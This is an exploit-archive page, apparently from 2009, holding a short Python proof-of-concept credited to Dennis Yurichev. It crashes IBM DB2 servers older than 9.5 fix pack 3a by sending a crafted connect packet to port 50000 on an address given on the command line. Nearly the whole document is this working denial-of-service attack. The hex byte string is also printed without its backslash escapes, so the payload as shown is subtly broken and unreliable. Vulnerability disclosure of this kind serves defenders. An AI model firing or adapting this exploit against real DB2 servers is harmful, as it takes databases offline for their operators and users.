IBM DB2 < 9.5 pack 3a Malicious Connect Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IBM DB2 < 9.5 pack 3a Malicious Connect Denial of Service Exploit
# Published : 2009-04-03
# Author : Dennis Yurichev
# Previous Title : Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
# Next Title : IBM DB2 < 9.5 pack 3a Malicious Data Stream Denial of Service Exploit

# Discovered by Dennis Yurichev <dennis@conus.info>

# DB2TEST database should be present on target system

from sys import *
from socket import *

sockobj = socket(AF_INET, SOCK_STREAM)

sockobj.connect ((argv[1], 50000))

sockobj.send(
"x00xBExD0x41x00x01x00xB8x10x41x00x7Fx11x5Ex97xA8"
"xA3x88x96x95x4Bx85xA7x85x40x40x40x40x40x40x40x40"
"x40x40xF0xF1xC3xF4xF0xF1xF1xF8xF0xF0xF0x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x60xF0xF0"
"xF0xF1xD5xC1xD4xC5x40x40x40x40x40x40x40x40x40x40"
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40"
"xC4xC2xF2xE3xC5xE2xE3x40xF0xC4xC2xF2x40x40x40x40"
"x40x40x40x40x40x40x40x40x40x00x18x14x04x14x03x00"
"x07x24x07x00x09x14x74x00x05x24x0Fx00x08x14x40x00"
"x08x00x0Bx11x47xD8xC4xC2xF2x61xD5xE3x00x06x11x6D"
"xE7xD7x00x0Cx11x5AxE2xD8xD3xF0xF9xF0xF5xF0x00x4A"
"xD0x01x00x02x00x44x10x6Ex00x06x11xA2x00x09x00x16"
"x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40x40x40"
"x40x40x40x40x00x24x11xDCx6FxC1x3BxD4x3Cx33xF8x0C"
"xC9x96x6Ex6CxCDxB9x0Ax2Cx9CxECx49x2Ax1Ax4DxCEx62"
"x47x9Dx37x88xA8x77x23x43")

sockobj.close()

# www.Syue.com [2009-04-03]